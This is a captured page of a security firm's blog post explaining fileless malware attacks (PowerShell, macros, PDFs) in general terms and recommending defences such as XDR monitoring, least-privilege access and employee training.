pratum.com Open in urlscan Pro
192.124.249.57  Public Scan

Form analysis
1 forms found in the DOM

POST /blog

<form action="/blog" method="post" id="login-form" class="">
  <div class="userdata">
    <div id="form-login-username" class="form-group">
      <input id="modlgn-username" type="text" name="username" class="form-control" tabindex="0" placeholder="Username">
    </div>
    <div id="form-login-password" class="form-group">
      <input id="modlgn-passwd" type="password" name="password" class="form-control" tabindex="0" placeholder="Password">
    </div>
    <div id="form-login-remember" class="control-group checkbox">
      <label for="modlgn-remember" class="control-label"><input id="modlgn-remember" type="checkbox" name="remember" class="inputbox" value="yes"> Remember Me</label>
    </div>
    <div id="form-login-submit" class="control-group">
      <div class="controls">
        <button type="submit" tabindex="0" name="Submit" class="btn btn-primary btn-default">Log in &nbsp; <span class="livicon" data-name="sign-in" data-size="18" data-color="#ffffff" data-hovercolor="0" data-onparent="true" data-iteration="3"
            id="livicon-1" style="width: 18px; height: 18px;"><svg height="18" version="1.1" width="18" xmlns="http://www.w3.org/2000/svg" id="canvas-for-livicon-1" style="overflow: hidden; position: relative;">
              <desc style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);">Created with Raphaël 2.1.0</desc>
              <defs style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);"></defs>
              <path fill="#ffffff" stroke="none"
                d="M14.424,8.135C14.191,7.901,14,7.979,14,8.311V12H7.2C6.537,12,6,12.537,6,13.2V18.801C6,19.463,6.537,20,7.2,20H14V23.689C14,24.019,14.191,24.099,14.424,23.865L22,16.424C22.234,16.192,22.234,15.809999999999999,22,15.575999999999999L14.424,8.135Z"
                opacity="1" stroke-width="0" transform="matrix(0.5625,0,0,0.5625,0,0)" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0); opacity: 1;"></path>
              <path fill="#ffffff" stroke="none" d="M27,30H15C14.447,30,14,29.553,14,29V27C14,26.447,14.447,26,15,26H26V6H15C14.447,6,14,5.553,14,5V3C14,2.447,14.447,2,15,2H27C28.656,2,30,3.343,30,5V27C30,28.656,28.656,30,27,30Z" stroke-width="0"
                transform="matrix(0.5625,0,0,0.5625,0,0)" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);"></path>
            </svg></span></button>
      </div>
    </div>
    <ul class="list-inline">
      <li>
        <a href="/component/users/?view=remind">
					Forgot your username?</a>
      </li>
      <li>
        <a href="/component/users/?view=reset">
					Forgot your password?</a>
      </li>
    </ul>
    <input type="hidden" name="option" value="com_users">
    <input type="hidden" name="task" value="user.login">
    <input type="hidden" name="return"
      value="aHR0cHM6Ly9wcmF0dW0uY29tL2Jsb2cvNTE1LXdoYXQtYXJlLWZpbGVsZXNzLW1hbHdhcmUtYXR0YWNrcz91dG1fbWVkaXVtPWVtYWlsJl9oc21pPTE5MDI0NTMxNSZfaHNlbmM9cDJBTnF0ei05X1JwRENQcUVTTElOMHFWdEdhMVVuR2taSWU4NkhmM2Yzbl91Z3ZvTHdibE5jd0ZHRjU2amhTRm40OHY1NnBla0p6eEhuRXBjRGVTTzdZM0pHR0tVVkYxV0lLUSZ1dG1fY29udGVudD0xOTAyNDUzMTMmdXRtX3NvdXJjZT1oc19lbWFpbA==">
    <input type="hidden" name="41c05f1f465c35e8320f40ab20c5b8b8" value="1">
  </div>
</form>

Text Content

 * Search
 * (515) 965-3756

 * Home
 * Services
   *  * Consulting & Advisory
      * Virtual CISO
      * Digital Forensics
      * Incident Response
      * Security Consulting
     
      * Assessments & Testing
      * Risk Assessments
      * Penetration Testing
      * IT Audits
      * OT Security
     
      * Compliance
      * HIPAA Compliance
      * PCI Compliance
      * SOC 2
      * FISMA / FedRAMP / RMF
      * CMMC
      * Data Privacy
     
      * Security Operations
      * SOC Overview
      * Vulnerability Scanning
      * Managed XDR
 * Industries
   * Healthcare
   * Banking
   * Technology and SaaS Providers
   * Retail
   * Manufacturing
 * Resources
   * Case Studies
   * Events
   * Infographics
     * Banking Information Security Infographic
   * Speakers Bureau
   * Posters
   * Videos
   * Papers
   * Webinars
 * Blog
 * Company
   * About Our Company
   * Leadership
   * FAQs
   * Careers
   * Join Partner Network
 * Contact


PRATUM BLOG


WHAT ARE FILELESS MALWARE ATTACKS?

Details Written by Trevor Meers Category: Blog Created: 17 September 2021
fShare


Share





Every ransomware update you’ll hear right now includes discussion of a growing
threat that goes by multiple names. Fileless malware. Living-off-the-land
attacks. Memory-based attacks. Non-malware attacks.

Whatever you call it, the fileless malware threat is growing and extremely
evasive—but you can mount a meaningful defense. In this blog, we talk with
Pratum Senior Penetration Tester Jason Moulder about the growing issue of
fileless malware attacks, how they work and how you can create an effective
defense against this slippery enemy.





FILELESS MALWARE BASICS

Fileless malware attacks give almost no sign of entry and leave almost no
evidence in their wake. If a data breach were a physical burglary, a fileless
malware attack would look something like arriving at your office to find the
company’s secret formula missing from the vault. Yet there’s no sign of a broken
lock, overturned furniture or even a footprint in the carpet. The bad guys seem
to have materialized in the vault and evaporated with the goods just as
mysteriously. The reality, however, is that they somehow convinced one of your
trusted employees to steal the formula using their approved access to the vault.

In the same way, fileless malware attacks without introducing a foreign file
into your system. It sneaks into legitimate operating system processes
(especially Windows PowerShell) and works against you. That makes it extremely
hard to detect through traditional antivirus software, which works by looking
for known file signatures.

This hacking technique has been surging lately, as fileless malware attacks
jumped 900% in 2020, according to one report. One study found that 74% of
malware attacks in Q1 2021 were zero-day attacks, which includes any attack that
doesn’t shown up in the databases of signature-scanning tools.





HOW FILELESS MALWARE WORKS








Because these attacks leverage scripts within your legitimate software to launch
their attacks, they’re a bit like a digital cancer, with hackers turning the
system’s own elements against it. With no file installation to detect, antivirus
programs usually can’t see them. And because the fileless malware exploits
trusted applications or the operating system itself, whitelisting apps you
consider dangerous won’t do any good. The most common vectors in fileless
attacks are scripts that exploit Windows’ PowerShell, accounting for up to 90%
of fileless attacks in some studies. Hackers also frequently leverage Windows
Remote Management (WinRM) in fileless attacks.

Pratum Senior Penetration Tester Jason Moulder, who spends his days getting
inside hackers’ minds, calls fileless malware one of the most elusive threats in
play. “If you were to scan all the communication between all the APIs in your
system every day, you’re looking at an incredible amount of data. If you look at
your Task Manager, you’ll see certain elements running 50 times simultaneously
because it’s used by multiple programs. That’s what makes fileless malware such
a great attack avenue. The malicious activity gets lost inside the normal
activities that make your operating system function.”

Digital forensics investigations struggle to analyze how attacks happened
because the malicious script runs in memory and disappears after the system
restarts.

Hackers also like this form of attack because it gives them admin access to an
endpoint, letting them exploit it as a gateway to the rest of the network.





COMMON FILELESS MALWARE CARRIERS

The security community has identified scores of binaries, scripts and libraries
that hackers use in fileless attacks. (You can browse a list here.) Here are
some of the most common ways that hackers get a foot in the door for these
attacks:

Web scripts – Hackers often launch malicious scripts through JavaScript, a
staple of web page design. (Hackers also relied on the popular Flash web-based
script before it was officially discontinued early in 2021.) Hackers lure users
into clicking a link in an e-mail that takes them to a website that looks legit
but is set up to scan for vulnerabilities and slip malicious code into the
system. That means, as usual, that social engineering is a critical
vulnerability you need to shut down through better user training.

PDFs – The issue with this ubiquitous file type typically revolves around
opening PDFs in the web browser by default, which triggers one of the scripts
hackers seek to exploit by blending their code into legitimate processes. “For
example,” Jason says, “you can write something for PowerShell that says, ‘When
you open this, open this command in the background and go get this file from the
Internet.’ Whenever it goes to this website, that site can load something into
memory.”

Microsoft Office macros – Similarly, Office macros run scripts that give hackers
a chance to piggyback with their own malicious scripts. In response, Office now
automatically blocks most macros. But Jason warns, “You can still trick people
into enabling the macro. It may require some limited user action to initiate it,
especially if it’s a Word doc or a PDF. When they click it to open it, that part
is written to disk and can be seen in forensics. But once it’s loaded into
memory, that’s where it can get lost pretty quickly.”





HOW YOU CAN PROTECT YOURSELF

Security leaders engage in a daily arms race with hackers as each side counters
new moves by the other. While fileless malware presents a serious threat, you
can actively defend against it with the following steps.

Implement managed XDR – A managed XDR service like Pratum’s provides complete
monitoring across your entire system through SIEM, endpoint detection and
response and 24/7 SOC analysts interpreting the alerts that come in. Managed XDR
spots suspicious activity and correlates signals to form a picture of a
developing threat, even when it’s caused by something other than a known
malicious file.

Jason points to the following indicators that XDR can pick up as the sign of a
brewing fileless malware attack:

 * Numerous queries against Active Directory related to user and domain
   enumeration. That could give away an attacker preparing to pivot by exploring
   what access they have.
 * Legitimate activities chained together in unusual ways. “If someone
   initialized a connection and then tried to impersonate an administrator or
   grab a Kerberos ticket, that’s not something that should happen,” Jason says.
 * Suspicious password activities. If your monitoring solution sees NTLM hashes
   being passed instead of legit passwords, that could be suspicious. It may
   mean someone scraped that from memory and doesn’t know the legit passwords.
 * Multiple admin logins from the same person or logins outside of normal hours.
 * Unapproved versions. If you prefer a particular version of PsExec, for
   example, whitelist only that version in your system. That makes it easier to
   spot someone running a different hashed version.





Limit user access – Many fileless malware attacks target users with wide-ranging
network access, using compromised credentials to pivot throughout the system. By
limiting users to only the data they really need (as described here), you can
limit hackers’ ability to move laterally if they get in.

Jason calls specific attention to admin accounts. “Using the default admin built
into Windows is a very bad habit because once you have that account, you can go
pretty much anywhere,” he says.

Train employees – This advice never goes out of style. Teaching employees to
recognize and avoid suspicious links will greatly reduce your risk by preventing
malicious scripts from ever getting the chance to scan a device and go to work.



START DEVELOPING
YOUR PROGRAM TODAY!

8 STEPS TO A MORE SECURE ORGANIZATION




Get it Now




For advice about you can protect your specific system from the ever-changing
fileless malware threat, contact Pratum today.

--------------------------------------------------------------------------------




SUBSCRIBE TO OUR NEWSLETTER

GET OUR BLOG ARTICLES DELIVERED
TO YOUR INBOX:






 * Sitemap
 * Search Site
 * Privacy Policy
 * Terms of Use

© 2021 - Pratum, Inc. All Rights Reserved
Des Moines, IA | Cedar Rapids, IA | Dallas, TX | Kansas City, KS
515-965-3756 | sales@pratum.com

 * 
 * 

×Close


LOGIN

Remember Me
Log in   Created with Raphaël 2.1.0
 * Forgot your username?
 * Forgot your password?

The information we track while users are on our websites helps us analyze site
traffic, optimize site performance, improve our services, and identify new
products and services of interest to our users. To learn more please see our
Privacy Policy.
Ok
Privacy Policy

x

x